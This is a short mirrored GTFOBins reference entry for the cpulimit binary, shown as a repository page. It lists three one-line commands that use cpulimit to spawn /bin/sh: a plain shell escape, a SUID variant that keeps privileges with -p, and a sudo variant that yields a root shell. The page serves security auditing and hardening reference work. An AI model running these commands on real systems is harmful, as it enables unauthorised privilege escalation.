1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 08:16:02 +02:00
GTFOBins.github.io/_gtfobins/cpulimit.md
2021-02-27 12:06:40 +01:00

174 B

functions
shell suid sudo
code
cpulimit -l 100 -f /bin/sh
code
./cpulimit -l 100 -f -- /bin/sh -p
code
sudo cpulimit -l 100 -f /bin/sh